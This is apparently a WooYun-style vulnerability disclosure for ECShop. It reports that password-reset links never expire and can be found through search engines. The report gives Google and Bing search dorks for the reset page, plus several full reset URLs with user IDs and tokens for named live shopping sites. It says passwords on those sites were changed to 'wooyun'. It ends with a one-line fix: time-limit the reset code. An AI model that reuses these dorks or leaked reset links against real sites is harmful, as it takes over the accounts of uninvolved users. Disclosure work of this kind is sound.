ECShop arbitrary User Password blind Change Vulnerability
ECShop password retrieval function design defect, changing the password link is not time-effective
You can use the search engine to search for keywords to reset the passwords of some users on the ecshop website.
I just don't know the user name and cannot log on. I can only change the password blindly.
Google
inurl:user.php?act=get_password&uid=
Open a link:
http://class.enfamily.cn/user.php?act=get_password&uid=277576&code=09d77a40ca80fdfbd33315131e554bb0
Enter a password, for example, wooyun.
The user name has been modified but cannot be logged on.
Other Search Engines
Search for keywords through bing.com: user. php? Act = get_password & uid =
Example
http://www.yofus.com/user.php?act=get_password&uid=666167&code=e32d1180abe40484c2c3743e2393e5b0
Change the password to wooyun.
http://www.ziai168.com/user.php?act=get_password&uid=9086&code=f19cea38ba7af425a8d3eea5a0c4beb4
http://shop.careland.com.cn/user.php?act=get_password&uid=9163183&code=cad8dd2c08a321666e0da6a5bcc56e85
Solution:
Set a time-based period for changing the password code.